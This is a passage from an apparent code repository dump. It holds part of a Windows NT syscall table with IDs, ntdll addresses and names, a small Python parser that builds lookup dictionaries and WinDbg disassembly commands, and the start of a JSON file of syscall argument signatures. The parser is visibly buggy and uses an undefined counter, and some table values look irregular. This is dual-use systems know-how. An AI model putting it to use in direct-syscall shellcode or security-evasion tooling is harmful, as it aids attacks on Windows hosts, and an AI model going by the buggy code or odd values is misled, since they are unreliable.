00007FFEFDA0EA60\tNtFlushProcessWriteBuffers\r\n0xEB\t 00007FFEFDA0EA80\tNtFlushVirtualMemory\r\n0x100EC\t 00007FFEFDA0EAA0\tNtFlushWriteBuffer\r\n0xED\t 00007FFEFDA0EAC0\tNtFreeUserPhysicalPages\r\n0x1E\t 00007FFEFDA0D0F0\tNtFreeVirtualMemory\r\n0xEE\t 00007FFEFDA0EAE0\tNtFreezeRegistry\r\n0xEF\t 00007FFEFDA0EB00\tNtFreezeTransactions\r\n0x1B0039\t 00007FFEFDA0D450\tNtFsControlFile\r\n0xF0\t 00007FFEFDA0EB20\tNtGetCachedSigningLevel\r\n0xF1\t 00007FFEFDA0EB40\tNtGetCompleteWnfStateSubscription\r\n0xF2\t 00007FFEFDA0EB60\tNtGetContextThread\r\n0x1900F3\t 00007FFEFDA0EB80\tNtGetCurrentProcessorNumber\r\n0xF4\t 00007FFEFDA0EBA0\tNtGetCurrentProcessorNumberEx\r\n0x700F5\t 00007FFEFDA0EBC0\tNtGetDevicePowerState\r\n0xF6\t 00007FFEFDA0EBE0\tNtGetMUIRegistryInfo\r\n0xF7\t 00007FFEFDA0EC00\tNtGetNextProcess\r\n0xF8\t 00007FFEFDA0EC20\tNtGetNextThread\r\n0xF9\t 00007FFEFDA0EC40\tNtGetNlsSectionPtr\r\n0xFA\t 00007FFEFDA0EC60\tNtGetNotificationResourceManager\r\n0xFB\t 00007FFEFDA0EC80\tNtGetWriteWatch\r\n0x300FC\t 00007FFEFDA0ECA0\tNtImpersonateAnonymousToken\r\n0x7001F\t 00007FFEFDA0D110\tNtImpersonateClientOfPort\r\n0xFD\t 00007FFEFDA0ECC0\tNtImpersonateThread\r\n0xFE\t 00007FFEFDA0ECE0\tNtInitializeEnclave\r\n0xFF\t 00007FFEFDA0ED00\tNtInitializeNlsFiles\r\n0x100\t 00007FFEFDA0ED20\tNtInitializeRegistry\r\n0x110101\t 00007FFEFDA0ED40\tNtInitiatePowerAction\r\n0x8004F\t 00007FFEFDA0D710\tNtIsProcessInJob\r\n0x10102\t 00007FFEFDA0ED60\tNtIsSystemResumeAutomatic\r\n0x103\t 00007FFEFDA0ED80\tNtIsUILanguageComitted\r\n0x104\t 00007FFEFDA0EDA0\tNtListenPort\r\n0x105\t 00007FFEFDA0EDC0\tNtLoadDriver\r\n0x106\t 00007FFEFDA0EDE0\tNtLoadEnclaveData\r\n0x107\t 00007FFEFDA0EE00\tNtLoadKey\r\n0x108\t 00007FFEFDA0EE20\tNtLoadKey2\r\n0x1D6\t 00007FFEFDA107E0\tNtLoadKey3\r\n0x109\t 00007FFEFDA0EE40\tNtLoadKeyEx\r\n0x10A\t 00007FFEFDA0EE60\tNtLockFile\r\n0x5010B\t 00007FFEFDA0EE80\tNtLockProductActivationKeys\r\n0x3010C\t 00007FFEFDA0EEA0\tNtLockRegistryKey\r\n0x10D\t 00007FFEFDA0EEC0\tNtLockVirtualMemory\r\n0x3010E\t 00007FFEFDA0EEE0\tNtMakePermanentObject\r\n0x3010F\t 00007FFEFDA0EF00\tNtMakeTemporaryObject\r\n0x110\t 00007FFEFDA0EF20\tNtManageHotPatch\r\n0x111\t 00007FFEFDA0EF40\tNtManagePartition\r\n0x112\t 00007FFEFDA0EF60\tNtMapCMFModule\r\n0x0A0113\t 00007FFEFDA0EF80\tNtMapUserPhysicalPages\r\n0x0A0003\t 00007FFEFDA0CD90\tNtMapUserPhysicalPagesScatter\r\n0x28\t 00007FFEFDA0D230\tNtMapViewOfSection\r\n0x114\t 00007FFEFDA0EFA0\tNtMapViewOfSectionEx\r\n0x115\t 00007FFEFDA0EFC0\tNtModifyBootEntry\r\n0x116\t 00007FFEFDA0EFE0\tNtModifyDriverEntry\r\n0x117\t 00007FFEFDA0F000\tNtNotifyChangeDirectoryFile\r\n0x118\t 00007FFEFDA0F020\tNtNotifyChangeDirectoryFileEx\r\n0x119\t 00007FFEFDA0F040\tNtNotifyChangeKey\r\n0x11A\t 00007FFEFDA0F060\tNtNotifyChangeMultipleKeys\r\n0x11B\t 00007FFEFDA0F080\tNtNotifyChangeSession\r\n0x58\t 00007FFEFDA0D830\tNtOpenDirectoryObject\r\n0x11C\t 00007FFEFDA0F0A0\tNtOpenEnlistment\r\n0x40\t 00007FFEFDA0D530\tNtOpenEvent\r\n0x11D\t 00007FFEFDA0F0C0\tNtOpenEventPair\r\n0x33\t 00007FFEFDA0D390\tNtOpenFile\r\n0x11E\t 00007FFEFDA0F0E0\tNtOpenIoCompletion\r\n0x11F\t 00007FFEFDA0F100\tNtOpenJobObject\r\n0x12\t 00007FFEFDA0CF70\tNtOpenKey\r\n0x120\t 00007FFEFDA0F120\tNtOpenKeyEx\r\n0x121\t 00007FFEFDA0F140\tNtOpenKeyTransacted\r\n0x122\t 00007FFEFDA0F160\tNtOpenKeyTransactedEx\r\n0x123\t 00007FFEFDA0F180\tNtOpenKeyedEvent\r\n0x124\t 00007FFEFDA0F1A0\tNtOpenMutant\r\n0x125\t 00007FFEFDA0F1C0\tNtOpenObjectAuditAlarm\r\n0x126\t 00007FFEFDA0F1E0\tNtOpenPartition\r\n0x127\t 00007FFEFDA0F200\tNtOpenPrivateNamespace\r\n0x26\t 00007FFEFDA0D1F0\tNtOpenProcess\r\n0x128\t 00007FFEFDA0F220\tNtOpenProcessToken\r\n0x30\t 00007FFEFDA0D330\tNtOpenProcessTokenEx\r\n0x129\t 00007FFEFDA0F240\tNtOpenRegistryTransaction\r\n0x12A\t 00007FFEFDA0F260\tNtOpenResourceManager\r\n0x37\t 00007FFEFDA0D410\tNtOpenSection\r\n0x12B\t 00007FFEFDA0F280\tNtOpenSemaphore\r\n0x12C\t 00007FFEFDA0F2A0\tNtOpenSession\r\n0x12D\t 00007FFEFDA0F2C0\tNtOpenSymbolicLinkObject\r\n0x12E\t 00007FFEFDA0F2E0\tNtOpenThread\r\n0x24\t 00007FFEFDA0D1B0\tNtOpenThreadToken\r\n0x2F\t 00007FFEFDA0D310\tNtOpenThreadTokenEx\r\n0x12F\t 00007FFEFDA0F300\tNtOpenTimer\r\n0x130\t 00007FFEFDA0F320\tNtOpenTransaction\r\n0x131\t 00007FFEFDA0F340\tNtOpenTransactionManager\r\n0x132\t 00007FFEFDA0F360\tNtPlugPlayControl\r\n0x5F\t 00007FFEFDA0D900\tNtPowerInformation\r\n0x133\t 00007FFEFDA0F380\tNtPrePrepareComplete\r\n0x134\t 00007FFEFDA0F3A0\tNtPrePrepareEnlistment\r\n0x135\t 00007FFEFDA0F3C0\tNtPrepareComplete\r\n0x136\t 00007FFEFDA0F3E0\tNtPrepareEnlistment\r\n0x0C0137\t 00007FFEFDA0F400\tNtPrivilegeCheck\r\n0x138\t 00007FFEFDA0F420\tNtPrivilegeObjectAuditAlarm\r\n0x139\t 00007FFEFDA0F440\tNtPrivilegedServiceAuditAlarm\r\n0x13A\t 00007FFEFDA0F460\tNtPropagationComplete\r\n0x13B\t 00007FFEFDA0F480\tNtPropagationFailed\r\n0x50\t 00007FFEFDA0D730\tNtProtectVirtualMemory\r\n0x13C\t 00007FFEFDA0F4A0\tNtPssCaptureVaSpaceBulk\r\n0x7013D\t 00007FFEFDA0F4C0\tNtPulseEvent\r\n0x3D\t 00007FFEFDA0D4D0\tNtQueryAttributesFile\r\n0x13E\t 00007FFEFDA0F4E0\tNtQueryAuxiliaryCounterFrequency\r\n0x13F\t 00007FFEFDA0F500\tNtQueryBootEntryOrder\r\n0x140\t 00007FFEFDA0F520\tNtQueryBootOptions\r\n0x50141\t 00007FFEFDA0F540\tNtQueryDebugFilterState\r\n0x50015\t 00007FFEFDA0CFD0\tNtQueryDefaultLocale\r\n0x40044\t 00007FFEFDA0D5B0\tNtQueryDefaultUILanguage\r\n0x35\t 00007FFEFDA0D3D0\tNtQueryDirectoryFile\r\n0x142\t 00007FFEFDA0F560\tNtQueryDirectoryFileEx\r\n0x143\t 00007FFEFDA0F580\tNtQueryDirectoryObject\r\n0x144\t 00007FFEFDA0F5A0\tNtQueryDriverEntryOrder\r\n0x145\t 00007FFEFDA0F5C0\tNtQueryEaFile\r\n0x56\t 00007FFEFDA0D7F0\tNtQueryEvent\r\n0x146\t 00007FFEFDA0F5E0\tNtQueryFullAttributesFile\r\n0x147\t 00007FFEFDA0F600\tNtQueryInformationAtom\r\n0x148\t 00007FFEFDA0F620\tNtQueryInformationByName\r\n0x149\t 00007FFEFDA0F640\tNtQueryInformationEnlistment\r\n0x11\t 00007FFEFDA0CF50\tNtQueryInformationFile\r\n0x14A\t 00007FFEFDA0F660\tNtQueryInformationJobObject\r\n0x14B\t 00007FFEFDA0F680\tNtQueryInformationPort\r\n0x19\t 00007FFEFDA0D050\tNtQueryInformationProcess\r\n0x14C\t 00007FFEFDA0F6A0\tNtQueryInformationResourceManager\r\n0x25\t 00007FFEFDA0D1D0\tNtQueryInformationThread\r\n0x21\t 00007FFEFDA0D150\tNtQueryInformationToken\r\n0x14D\t 00007FFEFDA0F6C0\tNtQueryInformationTransaction\r\n0x14E\t 00007FFEFDA0F6E0\tNtQueryInformationTransactionManager\r\n0x14F\t 00007FFEFDA0F700\tNtQueryInformationWorkerFactory\r\n0x40150\t 00007FFEFDA0F720\tNtQueryInstallUILanguage\r\n0x50151\t 00007FFEFDA0F740\tNtQueryIntervalProfile\r\n0x152\t 00007FFEFDA0F760\tNtQueryIoCompletion\r\n0x16\t 00007FFEFDA0CFF0\tNtQueryKey\r\n0x153\t 00007FFEFDA0F780\tNtQueryLicenseValue\r\n0x154\t 00007FFEFDA0F7A0\tNtQueryMultipleValueKey\r\n0x155\t 00007FFEFDA0F7C0\tNtQueryMutant\r\n0x110\t 00007FFEFDA0CF30\tNtQueryObject\r\n0x156\t 00007FFEFDA0F7E0\tNtQueryOpenSubKeys\r\n0x157\t 00007FFEFDA0F800\tNtQueryOpenSubKeysEx\r\n0x50031\t 00007FFEFDA0D350\tNtQueryPerformanceCounter\r\n0x10158\t 00007FFEFDA0F820\tNtQueryPortInformationProcess\r\n0x159\t 00007FFEFDA0F840\tNtQueryQuotaInformationFile\r\n0x51\t 00007FFEFDA0D750\tNtQuerySection\r\n0x15A\t 00007FFEFDA0F860\tNtQuerySecurityAttributesToken\r\n0x15B\t 00007FFEFDA0F880\tNtQuerySecurityObject\r\n0x15C\t 00007FFEFDA0F8A0\tNtQuerySecurityPolicy\r\n0x15D\t 00007FFEFDA0F8C0\tNtQuerySemaphore\r\n0x15E\t 00007FFEFDA0F8E0\tNtQuerySymbolicLinkObject\r\n0x15F\t 00007FFEFDA0F900\tNtQuerySystemEnvironmentValue\r\n0x160\t 00007FFEFDA0F920\tNtQuerySystemEnvironmentValueEx\r\n0x36\t 00007FFEFDA0D3F0\tNtQuerySystemInformation\r\n0x161\t 00007FFEFDA0F940\tNtQuerySystemInformationEx\r\n0x38\t 00007FFEFDA0D430\tNtQueryTimer\r\n0x0A0162\t 00007FFEFDA0F960\tNtQueryTimerResolution\r\n0x17\t 00007FFEFDA0D010\tNtQueryValueKey\r\n0x23\t 00007FFEFDA0D190\tNtQueryVirtualMemory\r\n0x49\t 00007FFEFDA0D650\tNtQueryVolumeInformationFile\r\n0x163\t 00007FFEFDA0F980\tNtQueryWnfStateData\r\n0x164\t 00007FFEFDA0F9A0\tNtQueryWnfStateNameInformation\r\n0x45\t 00007FFEFDA0D5D0\tNtQueueApcThread\r\n0x165\t 00007FFEFDA0F9C0\tNtQueueApcThreadEx\r\n0x166\t 00007FFEFDA0F9E0\tNtRaiseException\r\n0x167\t 00007FFEFDA0FA00\tNtRaiseHardError\r\n0x1A0006\t 00007FFEFDA0CDF0\tNtReadFile\r\n0x1A002E\t 00007FFEFDA0D2F0\tNtReadFileScatter\r\n0x168\t 00007FFEFDA0FA20\tNtReadOnlyEnlistment\r\n0x54\t 00007FFEFDA0D7B0\tNtReadRequestData\r\n0x3F\t 00007FFEFDA0D510\tNtReadVirtualMemory\r\n0x169\t 00007FFEFDA0FA40\tNtRecoverEnlistment\r\n0x16A\t 00007FFEFDA0FA60\tNtRecoverResourceManager\r\n0x16B\t 00007FFEFDA0FA80\tNtRecoverTransactionManager\r\n0x16C\t 00007FFEFDA0FAA0\tNtRegisterProtocolAddressInformation\r\n0x3016D\t 00007FFEFDA0FAC0\tNtRegisterThreadTerminatePort\r\n0x14016E\t 00007FFEFDA0FAE0\tNtReleaseKeyedEvent\r\n0x70020\t 00007FFEFDA0D130\tNtReleaseMutant\r\n0x0C000A\t 00007FFEFDA0CE70\tNtReleaseSemaphore\r\n0x3016F\t 00007FFEFDA0FB00\tNtReleaseWorkerFactoryWorker\r\n0x1C0009\t 00007FFEFDA0CE50\tNtRemoveIoCompletion\r\n0x170\t 00007FFEFDA0FB20\tNtRemoveIoCompletionEx\r\n80171h\t 00007FFEFDA0FB40\tNtRemoveProcessDebug\r\n0x172\t 00007FFEFDA0FB60\tNtRenameKey\r\n0x173\t 00007FFEFDA0FB80\tNtRenameTransactionManager\r\n0x174\t 00007FFEFDA0FBA0\tNtReplaceKey\r\n0x175\t 00007FFEFDA0FBC0\tNtReplacePartitionUnit\r\n0x0C\t 00007FFEFDA0CEB0\tNtReplyPort\r\n0x0B\t 00007FFEFDA0CE90\tNtReplyWaitReceivePort\r\n0x2B\t 00007FFEFDA0D290\tNtReplyWaitReceivePortEx\r\n0x176\t 00007FFEFDA0FBE0\tNtReplyWaitReplyPort\r\n0x177\t 00007FFEFDA0FC00\tNtRequestPort\r\n0x22\t 00007FFEFDA0D170\tNtRequestWaitReplyPort\r\n0x70178\t 00007FFEFDA0FC20\tNtResetEvent\r\n0x0C0179\t 00007FFEFDA0FC40\tNtResetWriteWatch\r\n0x17A\t 00007FFEFDA0FC60\tNtRestoreKey\r\n0x3017B\t 00007FFEFDA0FC80\tNtResumeProcess\r\n0x70052\t 00007FFEFDA0D770\tNtResumeThread\r\n0x17C\t 00007FFEFDA0FCA0\tNtRevertContainerImpersonation\r\n0x17D\t 00007FFEFDA0FCC0\tNtRollbackComplete\r\n0x17E\t 00007FFEFDA0FCE0\tNtRollbackEnlistment\r\n0x17F\t 00007FFEFDA0FD00\tNtRollbackRegistryTransaction\r\n0x180\t 00007FFEFDA0FD20\tNtRollbackTransaction\r\n0x181\t 00007FFEFDA0FD40\tNtRollforwardTransactionManager\r\n0x80182\t 00007FFEFDA0FD60\tNtSaveKey\r\n0x0E0183\t 00007FFEFDA0FD80\tNtSaveKeyEx\r\n0x0B0184\t 00007FFEFDA0FDA0\tNtSaveMergedKeys\r\n0x185\t 00007FFEFDA0FDC0\tNtSecureConnectPort\r\n0x186\t 00007FFEFDA0FDE0\tNtSerializeBoot\r\n0x187\t 00007FFEFDA0FE00\tNtSetBootEntryOrder\r\n0x188\t 00007FFEFDA0FE20\tNtSetBootOptions\r\n0x189\t 00007FFEFDA0FE40\tNtSetCachedSigningLevel\r\n0x18A\t 00007FFEFDA0FE60\tNtSetCachedSigningLevel2\r\n0x18B\t 00007FFEFDA0FE80\tNtSetContextThread\r\n0x0A018C\t 00007FFEFDA0FEA0\tNtSetDebugFilterState\r\n0x3018D\t 00007FFEFDA0FEC0\tNtSetDefaultHardErrorPort\r\n0x5018E\t 00007FFEFDA0FEE0\tNtSetDefaultLocale\r\n0x4018F\t 00007FFEFDA0FF00\tNtSetDefaultUILanguage\r\n0x190\t 00007FFEFDA0FF20\tNtSetDriverEntryOrder\r\n0x191\t 00007FFEFDA0FF40\tNtSetEaFile\r\n0x7000E\t 00007FFEFDA0CEF0\tNtSetEvent\r\n0x3002D\t 00007FFEFDA0D2D0\tNtSetEventBoostPriority\r\n0x30192\t 00007FFEFDA0FF60\tNtSetHighEventPair\r\n0x30193\t 00007FFEFDA0FF80\tNtSetHighWaitLowEventPair\r\n0x70194\t 00007FFEFDA0FFA0\tNtSetIRTimer\r\n0x195\t 00007FFEFDA0FFC0\tNtSetInformationDebugObject\r\n0x196\t 00007FFEFDA0FFE0\tNtSetInformationEnlistment\r\n0x27\t 00007FFEFDA0D210\tNtSetInformationFile\r\n0x197\t 00007FFEFDA10000\tNtSetInformationJobObject\r\n0x198\t 00007FFEFDA10020\tNtSetInformationKey\r\n0x5C\t 00007FFEFDA0D8A0\tNtSetInformationObject\r\n0x1C\t 00007FFEFDA0D0B0\tNtSetInformationProcess\r\n0x199\t 00007FFEFDA10040\tNtSetInformationResourceManager\r\n0x19A\t 00007FFEFDA10060\tNtSetInformationSymbolicLink\r\n0x0D\t 00007FFEFDA0CED0\tNtSetInformationThread\r\n0x19B\t 00007FFEFDA10080\tNtSetInformationToken\r\n0x19C\t 00007FFEFDA100A0\tNtSetInformationTransaction\r\n0x19D\t 00007FFEFDA100C0\tNtSetInformationTransactionManager\r\n0x19E\t 00007FFEFDA100E0\tNtSetInformationVirtualMemory\r\n0x19F\t 00007FFEFDA10100\tNtSetInformationWorkerFactory\r\n0x501A0\t 00007FFEFDA10120\tNtSetIntervalProfile\r\n0x1A1\t 00007FFEFDA10140\tNtSetIoCompletion\r\n0x1A2\t 00007FFEFDA10160\tNtSetIoCompletionEx\r\n0x1A3\t 00007FFEFDA10180\tNtSetLdtEntries\r\n0x301A4\t 00007FFEFDA101A0\tNtSetLowEventPair\r\n0x301A5\t 00007FFEFDA101C0\tNtSetLowWaitHighEventPair\r\n0x1A6\t 00007FFEFDA101E0\tNtSetQuotaInformationFile\r\n0x1A7\t 00007FFEFDA10200\tNtSetSecurityObject\r\n0x1A8\t 00007FFEFDA10220\tNtSetSystemEnvironmentValue\r\n0x1A9\t 00007FFEFDA10240\tNtSetSystemEnvironmentValueEx\r\n0x1AA\t 00007FFEFDA10260\tNtSetSystemInformation\r\n0x1AB\t 00007FFEFDA10280\tNtSetSystemPowerState\r\n0x501AC\t 00007FFEFDA102A0\tNtSetSystemTime\r\n0x501AD\t 00007FFEFDA102C0\tNtSetThreadExecutionState\r\n0x62\t 00007FFEFDA0D960\tNtSetTimer\r\n0x1AE\t 00007FFEFDA102E0\tNtSetTimer2\r\n0x1AF\t 00007FFEFDA10300\tNtSetTimerEx\r\n0x0A01B0\t 00007FFEFDA10320\tNtSetTimerResolution\r\n0x401B1\t 00007FFEFDA10340\tNtSetUuidSeed\r\n0x60\t 00007FFEFDA0D920\tNtSetValueKey\r\n0x1B2\t 00007FFEFDA10360\tNtSetVolumeInformationFile\r\n0x1B3\t 00007FFEFDA10380\tNtSetWnfProcessNotificationEvent\r\n0x401B4\t 00007FFEFDA103A0\tNtShutdownSystem\r\n0x1B5\t 00007FFEFDA103C0\tNtShutdownWorkerFactory\r\n0x301B6\t 00007FFEFDA103E0\tNtSignalAndWaitForSingleObject\r\n0x1B7\t 00007FFEFDA10400\tNtSinglePhaseReject\r\n0x301B8\t 00007FFEFDA10420\tNtStartProfile\r\n0x301B9\t 00007FFEFDA10440\tNtStopProfile\r\n0x1BA\t 00007FFEFDA10460\tNtSubscribeWnfStateChange\r\n0x301BB\t 00007FFEFDA10480\tNtSuspendProcess\r\n0x701BC\t 00007FFEFDA104A0\tNtSuspendThread\r\n0x1BD\t 00007FFEFDA104C0\tNtSystemDebugControl\r\n0x1BE\t 00007FFEFDA104E0\tNtTerminateEnclave\r\n0x701BF\t 00007FFEFDA10500\tNtTerminateJobObject\r\n0x7002C\t 00007FFEFDA0D2B0\tNtTerminateProcess\r\n0x70053\t 00007FFEFDA0D790\tNtTerminateThread\r\n0x201C0\t 00007FFEFDA10520\tNtTestAlert\r\n0x1C1\t 00007FFEFDA10540\tNtThawRegistry\r\n0x1C2\t 00007FFEFDA10560\tNtThawTransactions\r\n0x1C3\t 00007FFEFDA10580\tNtTraceControl\r\n0x5E\t 00007FFEFDA0D8E0\tNtTraceEvent\r\n0x1101C4\t 00007FFEFDA105A0\tNtTranslateFilePath\r\n0x1C5\t 00007FFEFDA105C0\tNtUmsThreadYield\r\n0x1C6\t 00007FFEFDA105E0\tNtUnloadDriver\r\n0x1C7\t 00007FFEFDA10600\tNtUnloadKey\r\n0x1C8\t 00007FFEFDA10620\tNtUnloadKey2\r\n0x1C9\t 00007FFEFDA10640\tNtUnloadKeyEx\r\n0x1CA\t 00007FFEFDA10660\tNtUnlockFile\r\n0x1CB\t 00007FFEFDA10680\tNtUnlockVirtualMemory\r\n0x2A\t 00007FFEFDA0D270\tNtUnmapViewOfSection\r\n0x1CC\t 00007FFEFDA106A0\tNtUnmapViewOfSectionEx\r\n0x1CD\t 00007FFEFDA106C0\tNtUnsubscribeWnfStateChange\r\n0x1CE\t 00007FFEFDA106E0\tNtUpdateWnfStateData\r\n0x1CF\t 00007FFEFDA10700\tNtVdmControl\r\n0x601D0\t 00007FFEFDA10720\tNtWaitForAlertByThreadId\r\n0x1D1\t 00007FFEFDA10740\tNtWaitForDebugEvent\r\n0x1501D2\t 00007FFEFDA10760\tNtWaitForKeyedEvent\r\n0x1D005B\t 00007FFEFDA0D880\tNtWaitForMultipleObjects\r\n0x1E001A\t 00007FFEFDA0D070\tNtWaitForMultipleObjects32\r\n0x0D0004\t 00007FFEFDA0CDB0\tNtWaitForSingleObject\r\n0x1D3\t 00007FFEFDA10780\tNtWaitForWorkViaWorkerFactory\r\n0x301D4\t 00007FFEFDA107A0\tNtWaitHighEventPair\r\n0x301D5\t 00007FFEFDA107C0\tNtWaitLowEventPair\r\n0x30001\t 00007FFEFDA0CD50\tNtWorkerFactoryWorkerReady\r\n0x1A0008\t 00007FFEFDA0CE30\tNtWriteFile\r\n0x1A001B\t 00007FFEFDA0D090\tNtWriteFileGather\r\n0x57\t 00007FFEFDA0D810\tNtWriteRequestData\r\n0x3A\t 00007FFEFDA0D470\tNtWriteVirtualMemory\r\n0x10046\t 00007FFEFDA0D5F0\tNtYieldExecution\r\n0x36\t 00007FFEFDA0D3F0\tRtlGetNativeSystemInformation\r\n\"\"\"\r\nreverseDict={}\r\nnormalDict={}\r\n\r\nwinDbgList=[]\r\n\r\ninput=win11_21H2\r\ninput=win1021h2\r\nfor each in input:\r\n\t# outfile = input.split(\".\")[0]\r\n\tif t >1 and t < 100000:\r\n\t\toutfile = input.split(\"0x\")\r\n\t\t# outfile[1]\r\n\t\ttry:\r\n\t\t\tnew=(outfile[t])\r\n\t\t\tsyscall = new.split()\r\n\t\t\tprint (syscall)\r\n\t\t\tif syscall[0] in reverseDict:\r\n\t\t\t\tprint (syscall[0], \" is already present!!\")\r\n\t\t\t\tprint (\"****\",reverseDict[syscall[0]])\r\n\t\t\tnormalDict[str(int(syscall[0],16))]=syscall[2]\r\n\t\t\treverseDict[syscall[2]]=int(syscall[0],16)\r\n\t\t\ttemp=(\"u ntdll!\"+syscall[2] + \" L2\")\r\n\t\t\twinDbgList.append(temp)\r\n\t\texcept:\r\n\t\t\tpass\r\n\tt+=1\r\n\r\nprint (\"\\n\\nReverse Dic\", len(reverseDict))\r\n\r\nprint (reverseDict)\r\nprint (\"\\n\\nNormal Dic\", len(normalDict))\r\nprint (normalDict)\r\n\r\nprint (\"winDbgList\")\r\nfor each in winDbgList:\r\n\tprint (each)" }, { "path": "start/syscall_signatures.json", "content": " {\"NtWorkerFactoryWorkerReady\":(1, [\"HANDLE\"], [\"WorkerFactoryHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtMapUserPhysicalPagesScatter\": (3, [\"PVOID\", \"ULONG_PTR\", \"PULONG_PTR\"], [\"*VirtualAddresses\", \"NumberOfPages\", \"UserPfnArray\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtWaitForMultipleObjects32\": (5, [\"ULONG\", \"PLONG\", \"WAIT_TYPE\", \"BOOLEAN\", \"PLARGE_INTEGER\"], [\"ObjectCount\", \"Handles\", \"WaitType\", \"Alertable\", \"Time_Out\"], \"Nt_WAIT_RESULT\", [None, None, None, None, None]), \"NtReplyWaitReceivePortEx\": (5, [\"HANDLE\", \"PVOID\", \"PPORT_MESSAGE\", \"PPORT_MESSAGE\", \"PLARGE_INTEGER\"], [\"PortHandle\", \"*PortContext\", \"ReplyMessage\", \"ReceiveMessage\", \"Time_Out\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\", \"__IN_opt\", \"__OUT_opt\", \"__IN_opt\"]), \"NtQueryDefaultUILanguage\": (1, [\"*LANGID\"], [\"DefaultUILanguageId\"], \"NTSTATUS\", [None]), \"NtApphelpCacheControl\": (2, [\"AHC_SERVICE_CLASS\", \"PVOID\"], [\"ServiceClass\", \"ServiceContext\"], \"NTSTATUS\", [\"__IN_\", \"__IN_OUT_opt_\"]), \"NtCreateProcessEx\": (9, [\"HANDLE\", \"ACCESS_MASK\", \"OBJECT_ATTRIBUTES\", \"HANDLE\", \"BOOLEAN\", \"HANDLE\", \"HANDLE\", \"HANDLE\", \"BOOLEAN\"], [\"ProcessHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"ParentProcess\", \"InheritObjectTable\", \"SectionHandle\", \"DebugPort\", \"ExceptionPort\", \"InJob\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN\"]), \"NtIsProcessInJob\": (2, [\"HANDLE\", \"HANDLE\"], [\"ProcessHandle\", \"JobHandle\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\"]), \"NtAccessCheckByTypeAndAuditAlarm\": (16, [\"PUNICODE_STRING\", \"PVOID\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PSECURITY_DESCRIPTOR\", \"PSID\", \"ACCESS_MASK\", \"AUDIT_EVENT_TYPE\", \"ULONG\", \"POBJECT_TYPE_LIST\", \"ULONG\", \"PGENERIC_MAPPING\", \"BOOLEAN\", \"PACCESS_MASK\", \"PNTSYSAPI\", \"PBOOLEAN\"], [\"SubsystemName\", \"HandleId\", \"ObjectTypeName\", \"ObjectName\", \"SecurityDescriptor\", \"PrincipalSelfSid\", \"DesiredAccess\", \"AuditType\", \"Flags\", \"ObjectTypeList\", \"ObjectTypeListLength\", \"GenericMapping\", \"ObjectCreation\", \"GrantedAccess\", \"NTSTATUS\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_\", None, \"__IN_\", \"__IN_\", \"__IN_\", None, None, None]), \"NtTraceEvent\": (4, [\"HANDLE\", \"ULONG\", \"ULONG\", \"PVOID\"], [\"TraceHandle\", \"Flags\", \"FieldSize\", \"Fields\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtPowerInformation\": (5, [\"POWER__INFORMATION_LEVEL\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"InformationLevel\", \"InputBuffer\", \"InputBufferLength\", \"__OUTputBuffer\", \"__OUTputBufferLength\"], \"NTSTATUS\", [\"__IN_\", None, \"__IN_\", None, \"__IN_\"]), \"NtAccessCheckByType\": (11, [\"PSECURITY_DESCRIPTOR\", \"PSID\", \"HANDLE\", \"ACCESS_MASK\", \"POBJECT_TYPE_LIST\", \"ULONG\", \"PGENERIC_MAPPING\", \"PPRIVILEGE_SET\", \"PULONG\", \"PACCESS_MASK\", \"PNTSYSAPI\"], [\"SecurityDescriptor\", \"PrincipalSelfSid\", \"ClientToken\", \"DesiredAccess\", \"ObjectTypeList\", \"ObjectTypeListLength\", \"GenericMapping\", \"PrivilegeSet\", \"PrivilegeSetLength\", \"GrantedAccess\", \"NTSTATUS\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", None, \"__IN_\", \"__IN_\", None, \"__IN_OUT_\", None, None]), \"NtAccessCheckByTypeResultList\": (11, [\"PSECURITY_DESCRIPTOR\", \"PSID\", \"HANDLE\", \"ACCESS_MASK\", \"POBJECT_TYPE_LIST\", \"ULONG\", \"PGENERIC_MAPPING\", \"PPRIVILEGE_SET\", \"PULONG\", \"PACCESS_MASK\", \"PNTSYSAPI\"], [\"SecurityDescriptor\", \"PrincipalSelfSid\", \"ClientToken\", \"DesiredAccess\", \"ObjectTypeList\", \"ObjectTypeListLength\", \"GenericMapping\", \"PrivilegeSet\", \"PrivilegeSetLength\", \"GrantedAccess\", \"NTSTATUS\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", None, \"__IN_\", \"__IN_\", None, \"__IN_OUT_\", None, None]), \"NtAccessCheckByTypeResultListAndAuditAlarm\": (16, [\"PUNICODE_STRING\", \"PVOID\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PSECURITY_DESCRIPTOR\", \"PSID\", \"ACCESS_MASK\", \"AUDIT_EVENT_TYPE\", \"ULONG\", \"POBJECT_TYPE_LIST\", \"ULONG\", \"PGENERIC_MAPPING\", \"BOOLEAN\", \"PACCESS_MASK\", \"PNTSYSAPI\", \"PBOOLEAN\"], [\"SubsystemName\", \"HandleId\", \"ObjectTypeName\", \"ObjectName\", \"SecurityDescriptor\", \"PrincipalSelfSid\", \"DesiredAccess\", \"AuditType\", \"Flags\", \"ObjectTypeList\", \"ObjectTypeListLength\", \"GenericMapping\", \"ObjectCreation\", \"GrantedAccess\", \"NTSTATUS\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_\", None, \"__IN_\", \"__IN_\", \"__IN_\", None, None, None]), \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": (17, [\"PUNICODE_STRING\", \"PVOID\", \"HANDLE\", \"PUNICODE_STRING\", \"PUNICODE_STRING\", \"PSECURITY_DESCRIPTOR\", \"PSID\", 